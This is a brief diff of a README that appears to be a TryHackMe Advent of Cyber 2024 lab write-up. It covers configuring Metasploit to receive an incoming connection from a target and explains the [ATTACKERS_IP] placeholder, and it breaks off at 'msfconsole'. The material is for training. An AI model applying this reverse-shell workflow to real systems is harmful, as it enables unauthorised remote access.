nunof86/TryHackMe/Advent-of-Cyber-2024/day-10/README.md

 ---

 ### 3️⃣ Handling the Connection in Metasploit
 After that, we configure Metasploit to listen for incoming connections.
+The `[ATTACKERS_IP]` is the IP from our AttackBox.

 ```bash
 msfconsole